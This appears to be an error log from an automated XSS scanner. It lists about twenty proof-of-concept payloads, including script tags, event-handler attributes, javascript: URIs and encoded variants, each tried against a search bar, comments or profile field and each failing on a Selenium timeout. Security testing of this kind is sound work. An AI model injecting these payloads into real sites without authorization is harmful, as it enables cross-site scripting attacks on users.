# Error XSS Payloads - 2025-06-25 23:57:38.784371
# Payload | Expected Behavior | Actual Behavior | Context | Test Context
<audio src=x onerror=alert(1)> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<iframe onload=alert(1)> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | comments
<details open ontoggle=alert(1)> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<img src=invalid onerror=alert(1)> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
" onmouseover=alert(1) | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | comments
%3Cimg%20src=x%20onerror=alert(1)%3E | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<div onclick=alert(1)>Click</div> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<img src=x onerror=alert(1)> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<textarea onfocus=alert(1) autofocus> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<object data=javascript:alert(1)> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | comments
"><img src=x onerror=alert(1)> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<input onfocus=alert(1) autofocus> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
&#60;img src=x onerror=alert(1)&#62; | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<video src=x onerror=alert(1)> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<button onclick=alert(1)>Click</button> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
javascript:alert(1) | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | comments
<marquee onstart=alert(1)> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<select onchange=alert(1)> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | search_bar
<a href=javascript:alert(1)>Click</a> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | comments
<script>alert(1)</script> | Alert expected | Test failed | Error: Timeout waiting for element - Message: 
Stacktrace:
	GetHandleVerifier [0x0x7ff6ef8b6f65+76917]
	GetHandleVerifier [0x0x7ff6ef8b6fc0+77008]
	(No symbol) [0x0x7ff6ef669dea]
	(No symbol) [0x0x7ff6ef6c0256]
	(No symbol) [0x0x7ff6ef6c050c]
	(No symbol) [0x0x7ff6ef713887]
	(No symbol) [0x0x7ff6ef6e84af]
	(No symbol) [0x0x7ff6ef71065c]
	(No symbol) [0x0x7ff6ef6e8243]
	(No symbol) [0x0x7ff6ef6b1431]
	(No symbol) [0x0x7ff6ef6b21c3]
	GetHandleVerifier [0x0x7ff6efb8d29d+3051437]
	GetHandleVerifier [0x0x7ff6efb878f3+3028483]
	GetHandleVerifier [0x0x7ff6efba588d+3151261]
	GetHandleVerifier [0x0x7ff6ef8d182e+185662]
	GetHandleVerifier [0x0x7ff6ef8d96ef+218111]
	GetHandleVerifier [0x0x7ff6ef8bfae4+112628]
	GetHandleVerifier [0x0x7ff6ef8bfc99+113065]
	GetHandleVerifier [0x0x7ff6ef8a6c68+10616]
	BaseThreadInitThunk [0x0x7ffea560e8d7+23]
	RtlUserThreadStart [0x0x7ffea749c34c+44]
 | profile_bio
